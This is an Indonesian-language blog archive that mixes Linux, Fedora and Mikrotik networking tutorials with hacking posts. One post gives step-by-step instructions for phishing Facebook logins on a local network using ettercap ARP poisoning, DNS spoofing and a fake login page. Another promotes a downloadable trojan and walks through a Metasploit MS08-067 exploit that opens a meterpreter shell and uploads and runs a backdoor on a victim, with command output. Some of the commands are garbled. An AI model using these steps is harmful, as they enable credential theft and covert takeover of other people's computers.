Minggu, Juni 5

mempercepat koneksi ubuntu

- backup dulu file yang lama
  $ sudo cp /etc/sysctl.conf /etc/sysctl.conf.cadangan 

-edit file nya
 sudo gedit /etc/sysctl.conf

-copykan kode ini masukkan ke dalam kalimat paling akhir
 
 # increase TCP max buffer size setable using setsockopt(
net.core.rmem_max = 16777216
net.core.wmem_max = 16777216
# increase Linux autotuning TCP buffer limits
# min, default, and max number of bytes to use
# set max to at least 4MB, or higher if you use very high BDP paths
net.ipv4.tcp_rmem = 4096 87380 16777216
net.ipv4.tcp_wmem = 4096 65536 16777216
# don’t cache ssthresh from previous connectionnet.ipv4.tcp_no_metrics_save = 1
net.ipv4.tcp_moderate_rcvbuf = 1
# recommended to increase this for 1000 BT or higher
net.core.netdev_max_backlog = 2500
# for 10 GigE, use this, uncomment below
# net.core.netdev_max_backlog = 30000
# Turn off timestamps if you’re on a gigabit or very busy network
# Having it off is one less thing the IP stack needs to work on
#net.ipv4.tcp_timestamps = 0
# disable tcp selective acknowledgements.
net.ipv4.tcp_sack = 0
#enable window scaling
net.ipv4.tcp_window_scaling = 1 

-save file tersebut dengan menekan CTRL + S

- jalankan file yg sudah kita edit
  $ sudo sysctl -p

kalo untuk disable , hapus aja file yang kita tambah tadi

mempercantik ubuntu dengan figlet

nah sekarang saya ingin men share tentang mempercantik terminal ubuntu dengan figlet .
ni screenshot nya
cara install nya :
                           $ sudo apt-get install figlet
lalu kita harus edit file  di bashrc $ sudo nano .bashrc
ni screenshot nya

jadi misalkan mau tulis kata "aceh linuxer"
anda bisa menambah kata di paling bawah nya , tepat di bawah tulisan (fi)
 ( figlet aceh linuxer ) , mudah kan ...

Sabtu, Mei 28

Mengubah repository fedora ke server Local ( indonesia kambing ui )

1. Buka terminal, login sebagai root dan backup repository bawaan untuk persiapan jika terjadi kesalahan:

fedora@fedora ~]$ su
Password:
root@fedora]# cp /etc/yum.repos.d/fedora.repo /etc/yum.repos.d/fedora.repo.old
root@fedora]# cp /etc/yum.repos.d/fedora-updates.repo /etc/yum.repos.d/fedora-updates.repo.old

2. Kosongkan seluruh isi file dari fedora.repo dan fedora-updates.repo
root@redora]# echo "" > /etc/yum.repos.d/fedora.repo
root@fedora]# echo "" > /etc/yum.repos.d/fedora-updates.repo

3. Edit dan Isikan file fedora.repo dan fedora-updates.repo seperti dibawah ini
root@fedora]# nano /etc/yum.repos.d/fedora.repo
[kambingi386]
name=Fedora
baseurl=http://kambing.ui.ac.id/fedora/releases/14/Everything/i386/os
enable=1
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-fedora-$basearch

Simpan dengan mengetikan Ctrl+O, Enter, Cntr-X
Untuk Fedora  13 atau d bawah silahkan ganti angka 14 dengan versi Fedora yang anda miliki
contoh untuk Fedora 13: baseurl=http://kambing.ui.ac.id/fedora/releases/13/Everything/i386/os

root@fedora]# nano /etc/yum.repos.d/fedora-updates.repo
[kambingupdate]
name=Fedora
baseurl=http://kambing.ui.ac.id/fedora/updates/14/i386
enabled=1

Simpan dengan mengetikan Ctrl+O, Enter, Cntr-X
Sama seperti hal sebelumnyau ntuk Fedora  13 atau d bawah silahkan ganti angka 14 dengan versi Fedora yang anda miliki.
contoh untuk Fedora 13: baseurl=http://kambing.ui.ac.id/fedora/updates/14/i386
Terakhir lakukan update,.....

Jumat, Mei 27

PERBEDAAN HACKER, PHREAKER, CRACKER, SCAMMER, DEFACER, SCRIPT KIDDIES, HACKERWANNABE, DAN NEWBIE


Hacking adalah sebuah seni ketrampilan mengoperasikan/mengendalikan/menguasai komputer mencakup semua aspek mulai dari level dasar sampai level tertinggi baik dalam komputerisasi dasar, pemrograman dasar sampai dengan jaringan yang sangat rumit. Sedangkan orang yang mampu melakukan itu semua di beri julukan “hacker”. Hacker umumnya JUSTRU tidak sangat ingin di publikasikan apalagi sampai menggembar-gemborkan dirinya adalah hacker. Justru hacker cenderung diam dan tertutup dengan status sosial yang sangat normal. Bahkan sangat tidak mungkin anda sangka seseorang yang pendiam dan lugu bahkan culun adalah seorang hacker (bukan berarti semuanya). Hacker umum-nya tidak merusak, mereka kebanyakan mencari informasi/data penting tingkat tinggi bukan untuk mencuri/kesenangan tapi lebih cenderung untuk mengetes, bukan mengetes kemampuan mereka tapi system yang sedang mereka hadapi. Kebanyakan hacker tidak sangat mudah di kalahkan mereka mampu menguasai dan memutar balik keadaan karena mereka bisa di anggap satu level dengan system… Jadi kalau ada yang teriak “HAI SAYA INI HACKER” apakah dia memang masuk kategori hacker ataukah malah masuk kategori lain-nya yang lebih spesifik?


Cracker?
Cracker bisa di kategorikan sebagai orang yang memahami jenis pemrograman tingkat tinggi dan sedikit pengetahuan jaringan. UMUM-nya cracker kebanyakan membuat kemampuan untuk membuah sebuah program untuk meng-disfungsikan/me-manipulasi jalur yang seharusnya. Contohnya: Cracker membuat sebuah program agar program yang seharusnya berbayar menjadi gratis. Cracker tidak terlalu memahami seluk beluk jaringan mereka kebanyakan umum-nya cenderung menyukai segala sesuatu yang bersifat GRATISAN.

Defacer?
Pernah ada suatu kasus saya melihat orang dengan bangganya memamerkan nama panggilannya didalam sebuah website milik orang lain. Lalu berkata “Website itu sudah aku hack” HACK? SUMPE LO? defacer kebanyakan umum-nya adalah orang iseng yang sedang ingin mencoba mencari tau baik dari segi ilmu, kemampuan, dan jati diri… kebiasaan yang paling mudah diketahui adalah mereka gemar merubah tampilan website menggunakan/memanfaatkan kelemahan bug/kecacatan dalam sebuah program. Defacer umumnya tidak begitu memahami tentang level pemrograman mereka lebih cenderung memahami tentang kinerja sebuah webserver beserta script yang ada didalamnya.

Phreaker,
Mungkin jarang di Indonesia yang pernah mendengar kata ini. Phreaker ini sebenarnya hampir sama sifatnya dengan cracker dimana sama-sama menyukai GRATISAN. Bedanya Phreaker lebih fokus ke dalam bug jaringan/telekomunikasi. Contoh mudahnya orang bisa menelpon gratis padahal seharusnya berbayar, atau contoh lainnya seseorang menggunakan bug yang ada didalam sebuah perusahaan telekomunikasi (meskipun tidak diketahui bocornya informasi ini hasil sendiri atau diberi tahu orang dalam) itu adalah salah satu kegiatan phreaking dan orang yang melakukannya di sebut phreaker.

Hacker Wannabe,
ini yang sangat banyak dan mudah di jumpai di Indonesia :) banyaaaaaaakkkkkkkkk sekaliiiii… terutama di forum-forum. Saya kurang paham arti harfiah hacker wannabe tapi sebenarnya ini lebih cenderung mengarah ke psikologi dimana umum-nya para hacker wannabe ini ingin melakukan sesuatu yang gila dan di luar kenormalan baik di dalam cakupan kemampuannya atau diluar kemampuannya dengan tujuan mendapatkan pengakuan “hebat” atau “mampu” dari orang di sekitarnya. Contoh paling mudah kalau kalian punya teman yang mengaku bisa/jago hacking facebook/friendster dia termasuk dalam kategori hacker wannabe ini…

Script kiddies,
Ini juga sangat mudah dan banyaaaaaaaaaaaaaaaaaaaaaaaaak bisa di temukan di Indonesia. Kebanyakan script kiddies ini kebanyakan berbicara blablabla padahal sebenarnya dasar tentang apa yang dia lakukan dia tidak paham. Script kiddies bisa di masukkan dalam kategori advanced user dimana keahliannya adalah “menggunakan” bukan “menemukan” apalagi sampai tingkat “menciptakan” kebanyakan manusia bergaya script kiddies adalah para defacer yang suka merubah tampilan website dengan menggunakan tools/software/program yang bukan buatannya/hasil pemikirannya sendiri.

Scammer!
Kalau ini sih dulu sempat booming di Indonesia sekitar tahun 2000-2005 kalau di Indonesia dulu di beri julukan frauder alias penipu dunia maya yang cenderung menyukai melakukan penipuan/manipulasi/generalisasi kartu kredit untuk mendapatkan beberapa barang kesukaannya. Hampir sama jenisnya dengan cracker/phreaker namun sangat ceroboh dan bodoh. Umumnya scammer/frauder ini memahami tentang seluk beluk jaringan namun sangat buta tentang pemrograman dasar dan keamanan.

Newbie…
kalau yang ini sih sudah tidak perlu di letakkan dalam posisi abu-abu. Group newbie ini memang benar-benar pemula alias orang yang mungkin benar-benar baru menggunakan komputer. Kebanyakan newbie bisa berkembang menjadi Hacker, Cracker, Defacer, Phreaker, Hacker Wannabe, Script kiddies, sampai Scammer. Newbie ini seperti sebuah telur yang akan ditentukan oleh tingkat pengetahuannya untuk menangkap sebuah pelajaran atau keadaan lingkungannya. Newbie bisa berubah menjadi apa saja asal ada pendukungnya dan bagaimana cara dia menilai sesuatu berdasarkan pikirannya.

Di urut berdasarkan tingkat kemampuan dan berbahaya-nya reputasi berdasarkan kategori :

1. Hacker
2. Phreaker
3. Cracker
4. Scammer
5. Defacer
6. Script kiddies
7. Hacker wannabe
8. Newbie

sumber : http://childish13.blogspot.com

Kamis, Mei 26

Implimentasi pishing dengan DNS spoofing

mungkin ini jarang orang dengar gituuu ...
yang kebiasaan orang dengar sih etercap untuk hack fb orang tap ini lain gan ...
jadi yang saya maksud seperti judul itu sam dengan ettercap . namun pada dasar nya ettercap yang
bisa curi curi curi password facebook itu ,
tapi tehnik ini langsung mencuri password nya dari server / router . kebiasaan orang mencuri password orang dengan tehnik arpspoofing cuman ngelakuinnya 1 persatu dari client yang connect dengan AP router / server nya .
hal yang prlu disiapkan

  • persiapan 

1 . apache server ( sudo apt-get install apache2)
2 . php (sudo apt-get install php5)
3 . ettercap (sudo apt-get install ettercap)
4 . scribt pishing nya . contoh nya FAKE login facebook '
5 . airkopi segelas dengan snacke
 
oke next step
sekarang kita akan mencoba untuk mengecek apache2 apakah berjalan . coba aja ketik di browser yang agan gunakan localhost apabila ada tulisan its work . maka apache2 anda berjalan

jadi sekarang kita tinggal

  •        configure 
pengaturan ini sangat penting di jalankan .
edit file di /etc/etter.conf
selanjut nya cari barisan ini 
  #---------------
  #     Linux 
  #---------------

 # if you use ipchains:
    redir_command_on = "ipc198.182.196.5 6hains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
    redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

 # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j   
      REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j   
      REDIRECT --to-port %rport"

jadi hilang kan tanda pagarnya (#) sehinnga menjadi seperti yang dia atas itueee
jangan lupa save 

dan sekarang kita harus juga mengedit file di /usr/share/ettercap/etter.dns

microsoft.com      A   198.182.196.56
*.microsoft.com    A   198.182.196.56
www.microsoft.com  PTR 198.182.196.56      # Wildcards in PTR are not allowed

menjadi 

facebook.com      A   198.182.196.56
*facebook.com.com    A   198.182.196.56
www.facebook.com  PTR 198.182.196.56      # Wildcards in PTR are not allowed

facebook.com (site yang ingin kita pishing)

198.182.196.5 6( ip attacker )

sekrrang chmod file password di var/www supaya bisa di eksikusi
sudo /var/www/touch file password.txt
sudo /var/www/chmod file password.txt

jadi misalkan ip ente 192.168.1.45 maka ubahlah 192.168.195.56 menjadi 192.168.1.45
untuk mengecek ip kita bisa ketik di terminal ifconfig maka akan keluar ip anda

sekarang copykan FAKE login anda ke /var/www/   , 

  •     eksikusi

dan sekarang buka ettercap anda lewat terminal .
sudo ettercap -C -i (interace network)  
contoh sudo ettercap -C -i wlan0
dan sekarang keluar dah ettercap nya  , lalu pilih di tap sniif > unified sniffing > dan pilih interface anda
selanjutnya ke tab host > scan host dan maka akan keluar ip client yang connect ke AP router nya
kemudian ke tab pluging > manage pluging dan aktifkan autoadd & dns spoof
selanjut nya pilih ke tab mitm dan centang arp poisoning dan terakir ke tab start > plih start sniffing 
dan sekrang untuk menghilangkan jejak nya kita harus menyamar sebagai router acces point nya
sudo gedit /proc/sys/net/ipv4/ip_forward ( enter ) masukan pass laptob ente
ganti angka 0 menjadi 1 



  •      selesai
dan sekarang tinggal tunggu ajja . . . . 
tunnggu barang 10 menitan ane jamin sih facebook client udah ada sama kita
jadi password and email nya terletak di /var/www/ 
disitulah file nya . jadi buka file yang ber eksikusi passwordnya 
okeeeee dah





Rabu, Mei 25

MITM

Mengambil Kekuasaan Komputer Jaringan

Bukanlah hal yang mustahil jika anda dapat mengintai suluruh kegiatan yang dilakukan
di setiap computer di jaringan anda (sekolah, Kampus, Kantor) tanpa ada orang 
mengetahuinya. Bahkan anda juga dapat mengendalikannya dari jauh.

Seorang temanku tiba2 terkejut ketika dia sedang Chating, pesan yang terkirim ke teman 
chatnya berbeda dengan apa yang dia ketik. Ternyata seseorang telah mengendalikan 
komputernya lewat computer lain dan mengetikan kata-kata jorok dikomputernya. Alhasil 
temanku kecewa karena lawan chatnya kabur karena merasa diperlakukan tidak baik olehnya.

Beberapa data rahasia kantor di suatu perusahaan ternyata telah bocor dan dirubah oleh 
seseorang tak dikenal. Bagaimana semua itu tidak terjadi, jika sebuah computer yang 
menyimpan data penting terkoneksi kejaringan. Karena soseorang karyawan yang sedikit 
mengerti trik Hacking telah menyelundup masuk kekomputer tersebut. Dia merubah nilai 
gaji yang diperoleh seseorang saat user sedang lengah. Dia bahkan mengambil 
file penting dan mengirimnya kembali dengan data kacau yang telah dirubahnya. Pihak 
kantor terlambat 
mengetahui bahwa komputernya telah di bobol orang, karena admin kurang tanggap
 mengetahui perkembangan “Hacker Indonesia”.

Untuk mengambil alih computer orang di jaringan ada bermacam cara :
1. Masuk ke ruangan manager tanpa izin dan mengambil
computernya ( Ha ha itu cara konyol dan pasti akan dapet PHK dari bos he he).
2. Menyebarkan Trojan. Mungkin cara ini yang lebih
efektif walaupun masih banyak lagi cara yang lain.

Apa itu Trojan?
Klo yang belum tau silakan baca buku S’to atau sumber lain untuk lebih lengkapnya. 
File Trojan ini adalah yang memberi akses kita untuk masuk ke computer tertentu saat
 Trojan itu dijalankan. Dan kita juga harus memiliki software controllernya sesuai dengan 
pasangan Trojan tersebut.

Bagaimana mendapatkanya?
Trojan dapat dengan mudah di download dari internet dengan jenis yang bermacam-macam
 seperti yang telah dimuat di buku Seni Internet Hacking II. Tapi kebanyakan file Builder serta 
file trojannya telah mampu terdeteksi oleh antivirus dan kebanyakan virus Trojan ini 
mengganggu system sehingga korban cepat menyadari bahwa komputernya terkena virus. So,
 bagaimana solusinya?

Anda download toolsnya di
http://www.geocities.com/anton_riyadi2002/

Virus Trojan ini merupakan rekayasa kode sendiri dan tidak mengganggu sistem. 
Trojan ini juga tidak memunculkan pesan yang mencurigakan seperti virus local Indonesia
 pada umumnya. Sangat cocok bagi para pemula Hacker karena cukup mudah 
pengoperasiannya.
Anda cukup mengetikan nama computer/IP address dari computer yang telah terinfeksi 
Trojan maka ada sudah dapat mengambil alih computer tersebut tanpa diketahui korban. 

Sebelum orang mengambil alih computer anda ada baiknya anda mengetahui sedikit 
bagaimana tehnik Hacking.

Perhatian !!!
Tools Hacking adalah hanya untuk sarana belajar Hacking. Untuk kegiatan criminal resiko 
ditanggung pemakai.

Metasploit and Trojan optix pro


i kita  akan menggunakan modul exploit yang akan mem-parsing kelemahan kode pemrograman pada NetAPI32.dll, yang terdapat dalam layanan services bawaan windows. Ini berkaitan juga dengan services NetBIOS (Lagi-lagi netbiosnya windows, setelah bug RPC yang kian menjamur beberapa waktu yang lalu)

Modul ini mempunyai kemampuan mem-bypass DEP( Data Execution Prevention )dalam system operasi Wind*ws. DEP adalah salah satu services di wind*ws yang mempunyai fungsi untuk membantu mencegah/membatasi dampak yang terjadi pada saat ada virus atau sebuah ancaman keamanan [threat security] sedang aktif.
Untuk DEP ini, anda bisa melihat aktif apa tidaknya, pada bagian “Properties” di My Computer, lalu pilih pada bagian “Advanced” dan lihat pada bar “Data Execution Prevention”.
Modul ini bekerja, jika target adalah Wind*ws XP Operatin System (s/d WinXP SP 3), namun juga bisa pada target ber-OS Wind*s 2003, asalkan DEP-nya non aktif.
Ok, langsung kelangkah-nya.....

  • Senjata yang harus anda siapkan yaitu metasploit dengan update terbaru
  • siapkan sebuah trojan Optix Pro atau Trojan buatan anda sendiri
  • software untuk melakukan scanning Ip atau port misalnya "SUPERSCAN"
  • kopi susu +Snack
  • Ok Let's see
  • Pertama Pilih modul exlpoitnya, seperti berikut :
      msf > use windows/smb/ms08_067_netapi
      • untuk petunjuk opsi/pilhan yang bisa anda gunakan anda bisa lakukan :
      msf exploit(ms08_067_netapi) > show options 
      • lalu anda set target misalnya target kita 192.168.2.xxx
       msf>exploit(ms08_067_netapi) > set RHOST 192.168.2.xxx 
      • kemudian anda set PAYLOAD
        msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
        • Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi. Untuk kali ini, mudahnya kita pilih "windows/meterpreter/bind_tcp", maksudnya kita akan mengambil alih Shell metarpreternya  dari target hacking kita.
        • Untuk setting yang lain, karena kita masih belajar maka biarkan saja default adanya. 
        • kemudian tinggal jalankan EXPLOIT-nya :
          msf exploit(ms08_067_netapi) > exploit
          [*] Started bind handler
          [*] Connecting to the target…
          [*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
          [*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
          [*] Triggering the vulnerability…
          [*] Transmitting intermediate stager for over-sized stage…(191 bytes)
          [*] Sending stage (2650 bytes)
          [*] Sleeping before handling stage…
          [*] Uploading DLL (73227 bytes)…
          [*] Upload completed.
          [*] Meterpreter session 1 opened (192.168.54.1:51707 -> 192.168.2.xxx:4444) 

          Meterpreter >
          • Tahap selanjutnya adalah bagaimana cara kita mengupload sebuah trojan atau virus ke dalam system korban misalnya trojan yang saya buat bernama "trojan.exe"yang terletak di Directory c:\trojan.exe(komputer attackers) yang  akan kita upload ke "Directory c:\"(komputer victim/korban kita) maka perintah yang kita ketik
            Meterpreter > upload c:/backdoor.exe c:\ 
            [*] Uploading :c:/backdoor.exe ->c:\ 
            [*] Uploaded  :c:/backdoor.exe ->c:\\backdoor.exe  
            • Setelah Trojan berhasil di upload ke komputer Victim maka tahap selanjutnya fase eksekusi trojan yang kita upload tadi
              Meterpreter >cd c:
              Meterpreter >execute -f backdoor.exe
              Process 3328 created 
              • Ok trojan berhasil di eksekusi selanjutnya terserah anda.... 

                load balance mikrotik dengan PCC

                Teknik Loadbalanced di Mikrotik dengan PCC
                Load balance pada mikrotik adalah teknik untuk mendistribusikan beban trafik pada dua atau lebih jalur koneksi secara seimbang, agar trafik dapat berjalan optimal, memaksimalkan throughput, memperkecil waktu tanggap dan menghindari overload pada salah satu jalur koneksi.

                Selama ini banyak dari kita yang beranggapan salah, bahwa dengan men...ggunakan loadbalance dua jalur koneksi , maka besar bandwidth yang akan kita dapatkan menjadi dua kali lipat dari bandwidth sebelum menggunakan loadbalance (akumulasi dari kedua bandwidth tersebut). Hal ini perlu kita perjelas dahulu, bahwa loadbalance tidak akan menambah besar bandwidth yang kita peroleh, tetapi hanya bertugas untuk membagi trafik dari kedua bandwidth tersebut agar dapat terpakai secara seimbang.

                Dengan artikel ini, kita akan membuktikan bahwa dalam penggunaan loadbalancing tidak seperti rumus matematika 512 + 256 = 768, akan tetapi 512 + 256 = 512 + 256, atau 512 + 256 = 256 + 256 + 256.

                Pada artikel ini kami menggunakan RB433UAH dengan kondisi sebagai berikut :
                1.    Ether1 dan Ether2 terhubung pada ISP yang berbeda dengan besar bandwdith yang berbeda. ISP1 sebesar 512kbps dan ISP2 sebesar 256kbps.
                2.    Kita akan menggunakan web-proxy internal dan menggunakan openDNS.
                3.    Mikrotik RouterOS anda menggunakan versi 4.5  karena fitur PCC mulai dikenal pada versi 3.24.
                Jika pada kondisi diatas berbeda dengan kondisi jaringan ditempat anda, maka konfigurasi yang akan kita jabarkan disini harus anda sesuaikan dengan konfigurasi untuk jaringan ditempat anda.

                Konfigurasi Dasar

                Berikut ini adalah Topologi Jaringan dan IP address yang akan kita gunakan




                /ip address
                add address=192.168.101.2/30 interface=ether1
                add address=192.168.102.2/30 interface=ether2
                add address=10.10.10.1/24 interface=wlan2
                /ip dns
                set allow-remote-requests=yes primary-dns=208.67.222.222 secondary-dns=208.67.220.220

                Untuk koneksi client, kita menggunakan koneksi wireless pada wlan2 dengan range IP client 10.10.10.2 s/d 10.10.10.254 netmask 255.255.255.0, dimana IP 10.10.10.1 yang dipasangkan pada wlan2 berfungsi sebagai gateway dan dns server dari client. Jika anda menggunakan DNS dari salah satu isp anda, maka akan ada tambahan mangle yang akan kami berikan tanda tebal

                Setelah pengkonfigurasian IP dan DNS sudah benar, kita harus memasangkan default route ke masing-masing IP gateway ISP kita agar router meneruskan semua trafik yang tidak terhubung padanya ke gateway tersebut. Disini kita menggunakan fitur check-gateway berguna jika salah satu gateway kita putus, maka koneksi akan dibelokkan ke gateway lainnya.

                /ip route
                add dst-address=0.0.0.0/0 gateway=192.168.101.1 distance=1 check-gateway=ping
                add dst-address=0.0.0.0/0 gateway=192.168.102.1 distance=2 check-gateway=ping

                Untuk pengaturan Access Point sehingga PC client dapat terhubung dengan wireless kita, kita menggunakan perintah

                /interface wireless
                set wlan2 mode=ap-bridge band=2.4ghz-b/g ssid=Mikrotik disabled=no

                Agar pc client dapat melakukan koneksi ke internet, kita juga harus merubah IP privat client ke IP publik yang ada di interface publik kita yaitu ether1 dan ether2.

                /ip firewall nat
                add action=masquerade chain=srcnat out-interface=ether1
                add action=masquerade chain=srcnat out-interface=ether2

                Sampai langkah ini, router dan pc client sudah dapat melakukan koneksi internet. Lakukan ping baik dari router ataupun pc client ke internet. Jika belum berhasil, cek sekali lagi konfigurasi anda.


                Webproxy Internal
                Pada routerboard tertentu, seperti RB450G, RB433AH, RB433UAH, RB800 dan RB1100 mempunyai expansion slot (USB, MicroSD, CompactFlash) untuk storage tambahan. Pada contoh berikut, kita akan menggunakan usb flashdisk yang dipasangkan pada slot USB. Untuk pertama kali pemasangan, storage tambahan ini akan terbaca statusnya invalid di /system store. Agar dapat digunakan sebagai media penyimpan cache, maka storage harus diformat dahulu dan diaktifkan Nantinya kita tinggal mengaktifkan webproxy dan set cache-on-disk=yes untuk menggunakan media storage kita. Jangan lupa untuk membelokkan trafik HTTP (tcp port 80) kedalam webproxy kita.

                /store disk format-drive usb1

                /store
                add disk=usb1 name=cache-usb type=web-proxy
                activate cache-usb

                /ip proxy
                set cache-on-disk=yes enabled=yes max-cache-size=200000KiB port=8080

                /ip firewall nat
                add chain=dstnat protocol=tcp dst-port=80 in-interface=wlan2 action=redirect to-ports=8080


                Pengaturan Mangle

                Pada loadbalancing kali ini kita akan menggunakan fitur yang disebut PCC (Per Connection Classifier). Dengan PCC kita bisa mengelompokan trafik koneksi yang melalui atau keluar masuk router menjadi beberapa kelompok. Pengelompokan ini bisa dibedakan berdasarkan src-address, dst-address, src-port dan atau dst-port. Router akan mengingat-ingat jalur gateway yang dilewati diawal trafik koneksi, sehingga pada paket-paket selanjutnya yang masih berkaitan dengan koneksi awalnya akan dilewatkan  pada jalur gateway yang sama juga. Kelebihan dari PCC ini yang menjawab banyaknya keluhan sering putusnya koneksi pada teknik loadbalancing lainnya sebelum adanya PCC karena perpindahan gateway..
                Sebelum membuat mangle loadbalance, untuk mencegah terjadinya loop routing pada trafik, maka semua trafik client yang menuju network yang terhubung langsung dengan router, harus kita bypass dari loadbalancing. Kita bisa membuat daftar IP yang masih dalam satu network router dan  memasang mangle pertama kali sebagai berikut

                /ip firewall address-list
                add address=192.168.101.0/30 list=lokal
                add address=192.168.102.0/30 list=lokal
                add address=10.10.10.0/24 list=lokal

                /ip firewall mangle
                add action=accept chain=prerouting dst-address-list=lokal in-interface=wlan2 comment=”trafik lokal”
                add action=accept chain=output dst-address-list=lokal

                Pada kasus tertentu, trafik pertama bisa berasal dari Internet, seperti penggunaan remote winbox atau telnet dari internet dan sebagainya, oleh karena itu kita juga memerlukan mark-connection untuk menandai trafik tersebut agar trafik baliknya juga bisa melewati interface dimana trafik itu masuk

                /ip firewall mangle
                add action=mark-connection chain=prerouting connection-mark=no-mark in-interface=ether1 new-connection-mark=con-from-isp1 passthrough=yes comment=”trafik dari isp1”
                add action=mark-connection chain=prerouting connection-mark=no-mark in-interface=ether2 new-connection-mark=con-from-isp2 passthrough=yes comment=”trafik dari isp2”

                Umumnya, sebuah ISP akan membatasi akses DNS servernya dari IP yang hanya dikenalnya, jadi jika anda menggunakan DNS dari salah satu ISP anda, anda harus menambahkan mangle agar trafik DNS tersebut melalui gateway ISP yang bersangkutan bukan melalui gateway ISP lainnya. Disini kami berikan mangle DNS ISP1 yang melalui gateway ISP1. Jika anda menggunakan publik DNS independent, seperti opendns, anda tidak memerlukan mangle dibawah ini.

                /ip firewall mangle
                add action=mark-connection chain=output comment=dns dst-address=202.65.112.21 dst-port=53 new-connection-mark=dns passthrough=yes protocol=tcp comment=”trafik DNS citra.net.id”
                add action=mark-connection chain=output dst-address=202.65.112.21 dst-port=53 new-connection-mark=dns passthrough=yes protocol=udp
                add action=mark-routing chain=output connection-mark=dns new-routing-mark=route-to-isp1 passthrough=no

                Karena kita menggunakan webproxy pada router, maka trafik yang perlu kita loadbalance ada 2 jenis. Yang pertama adalah trafik dari client menuju internet (non HTTP), dan trafik dari webproxy menuju internet. Agar lebih terstruktur dan mudah dalam pembacaannya, kita akan menggunakan custom-chain sebagai berikut :

                /ip firewall mangle
                add action=jump chain=prerouting comment=”lompat ke client-lb” connection-mark=no-mark in-interface=wlan2 jump-target=client-lb
                add action=jump chain=output comment=”lompat ke lb-proxy” connection-mark=no-mark out-interface=!wlan2 jump-target=lb-proxy

                Pada mangle diatas, untuk trafik loadbalance client pastikan parameter in-interface adalah interface yang terhubung dengan client, dan untuk trafik loadbalance webproxy, kita menggunakan chain output dengan parameter out-interface yang bukan terhubung ke interface client. Setelah custom chain untuk loadbalancing dibuat, kita bisa membuat mangle di custom chain tersebut sebagai berikut

                /ip firewall mangle
                add action=mark-connection chain=client-lb dst-address-type=!local new-connection-mark=to-isp1 passthrough=yes per-connection-classifier=both-addresses:3/0 comment=”awal loadbalancing klien”
                add action=mark-connection chain=client-lb dst-address-type=!local new-connection-mark=to-isp1 passthrough=yes per-connection-classifier=both-addresses:3/1
                add action=mark-connection chain=client-lb dst-address-type=!local new-connection-mark=to-isp2 passthrough=yes per-connection-classifier=both-addresses:3/2
                add action=return chain=client-lb comment=”akhir dari loadbalancing”

                /ip firewall mangle
                add action=mark-connection chain=lb-proxy dst-address-type=!local new-connection-mark=con-from-isp1 passthrough=yes per-connection-classifier=both-addresses:3/0 comment=”awal load balancing proxy”
                add action=mark-connection chain=lb-proxy dst-address-type=!local new-connection-mark=con-from-isp1 passthrough=yes per-connection-classifier=both-addresses:3/1
                add action=mark-connection chain=lb-proxy dst-address-type=!local new-connection-mark=con-from-isp2 passthrough=yes per-connection-classifier=both-addresses:3/2
                add action=return chain=lb-proxy comment=”akhir dari loadbalancing”

                Untuk contoh diatas, pada loadbalancing client dan webproxy menggunakan parameter pemisahan trafik pcc yang sama, yaitu both-address, sehingga router akan mengingat-ingat berdasarkan src-address dan dst-address dari sebuah koneksi. Karena trafik ISP kita yang berbeda (512kbps dan 256kbps), kita membagi beban trafiknya menjadi 3 bagian. 2 bagian pertama akan melewati gateway ISP1, dan 1 bagian terakhir akan melewati gateway ISP2. Jika masing-masing trafik dari client dan proxy sudah ditandai, langkah berikutnya kita tinggal membuat mangle mark-route yang akan digunakan dalam proses routing nantinya

                /ip firewall mangle
                add action=jump chain=prerouting comment=”marking route client” connection-mark=!no-mark in-interface=wlan2 jump-target=route-client
                add action=mark-routing chain=route-client connection-mark=to-isp1 new-routing-mark=route-to-isp1 passthrough=no
                add action=mark-routing chain=route-client connection-mark=to-isp2 new-routing-mark=route-to-isp2 passthrough=no
                add action=mark-routing chain=route-client connection-mark=con-from-isp1 new-routing-mark=route-to-isp1 passthrough=no
                add action=mark-routing chain=route-client connection-mark=con-from-isp2 new-routing-mark=route-to-isp2 passthrough=no
                add action=return chain=route-client disabled=no

                /ip firewall mangle
                add action=mark-routing chain=output comment=”marking route proxy” connection-mark=con-from-isp1 new-routing-mark=route-to-isp1 out-interface=!wlan2 passthrough=no
                add action=mark-routing chain=output connection-mark=con-from-isp2 new-routing-mark=route-to-isp2 out-interface=!wlan2 passthrough=no


                Pengaturan Routing
                Pengaturan mangle diatas tidak akan berguna jika anda belum membuat routing berdasar mark-route yang sudah kita buat. Disini kita juga akan membuat routing backup, sehingga apabila sebuah gateway terputus, maka semua koneksi akan melewati gateway yang masing terhubung

                /ip route
                add check-gateway=ping dst-address=0.0.0.0/0 gateway=192.168.101.1 routing-mark=route-to-isp1 distance=1
                add check-gateway=ping dst-address=0.0.0.0/0 gateway=192.168.102.1 routing-mark=route-to-isp1 distance=2
                add check-gateway=ping dst-address=0.0.0.0/0 gateway=192.168.102.1 routing-mark=route-to-isp2 distance=1
                add check-gateway=ping dst-address=0.0.0.0/0 gateway=192.168.101.1 routing-mark=route-to-isp2 distance=2

                Pengujian

                Dari hasil pengujian kami, didapatkan sebagai berikut




                Dari gambar terlihat, bahwa hanya dengan melakukan 1 file download (1 koneksi), kita hanya mendapatkan speed 56kBps (448kbps) karena pada saat itu melewati gateway ISP1, sedangkan jika kita mendownload file (membuka koneksi baru) lagi pada web lain, akan mendapatkan 30kBps (240kbps). Dari pengujian ini terlihat dapat disimpulkan bahwa

                512kbps + 256kbps ≠ 768kbps

                Catatan :

                * Loadbalancing menggunakan teknik pcc ini akan berjalan efektif dan mendekati seimbang jika semakin banyak koneksi (dari client) yang terjadi.
                * Gunakan ISP yang memiliki bandwith FIX bukan Share untuk mendapatkan hasil yang lebih optimal.
                * Load Balance menggunakan PCC ini bukan selamanya dan sepenuhnya sebuah solusi yang pasti berhasil baik di semua jenis network, karena proses penyeimbangan dari traffic adalah berdasarkan logika probabilitas.

